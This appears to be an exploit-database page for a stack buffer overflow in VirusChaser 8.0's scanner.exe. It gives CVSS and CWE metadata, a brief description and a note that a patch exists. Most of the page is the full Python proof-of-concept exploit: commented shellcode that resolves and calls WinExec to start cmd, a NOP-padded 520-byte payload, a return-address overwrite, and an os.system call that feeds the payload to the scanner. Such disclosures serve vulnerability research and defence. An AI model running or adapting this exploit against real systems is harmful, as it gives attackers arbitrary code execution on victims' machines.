VirusChaser 8.0 - Stack Buffer Overflow

vendor:

VirusChaser 8.0

by:

wh1ant

9,3

CVSS

HIGH

Stack Buffer Overflow

119

CWE

Product Name: VirusChaser 8.0

Affected Version From: 8.0

Affected Version To: 8.0

Patch Exists: YES

Related CWE: N/A

CPE: a:viruschaser:viruschaser:8.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2014

VirusChaser 8.0 – Stack Buffer Overflow

VirusChaser 8.0 is vulnerable to a stack buffer overflow vulnerability. An attacker can exploit this vulnerability by sending a specially crafted payload to the scanner.exe application. The payload contains shellcode that is executed when the application attempts to process the malicious input. The shellcode is responsible for executing the WinExec() function, which can be used to execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of VirusChaser 8.0.

Source

Exploit-DB raw data:

# Exploit Title: VirusChaser 8.0 - Stack Buffer Overflow
# Date: 2014/03/26
# Exploit Author: wh1ant
# Vendor Homepage: https://www.viruschaser.com/
# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip
# Version: 8.0
# Tested on: Windows 7 ultimate K
#
# You must have administrator permission to run

from struct import pack
import os

shellcode = "\x66\x83\xc4\x10"        # add esp, 0x10
shellcode += "\xb8\x50\x70\x50\x50"   # mov eax, 0x50507050
shellcode += "\xb9\x4e\x7d\x04\x27"   # mov ecx, 0x27047d4e
shellcode += "\x03\xc1"               # add eax, ecx  ; WinExec() address
shellcode += "\x68\x63\x6d\x64\x01"   # push 0x01646D63
shellcode += "\x66\xb9\x50\x50"       # add cx, 0x5050
shellcode += "\x66\x81\xc1\xb0\xaf"   # add cx, 0xafb0
shellcode += "\x88\x4c\x24\x03"       # mov [esp+3], cl
shellcode += "\x8b\xd4"               # mov edx, esp
shellcode += "\x66\x51"               # push cx
shellcode += "\x41"                   # inc cx
shellcode += "\x66\x51"               # push cx
shellcode += "\x52"                   # push edx
shellcode += "\x50"                   # push eax
shellcode += "\x50"                   # push eax
shellcode += "\xc3\x90"               # retn  ; WinExec()

# BOF retn: 0x0040753d

pay = shellcode
pay = pay.rjust(520, "\x90")
pay += "\x9c\xdb\x12"

os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + pay + "\"")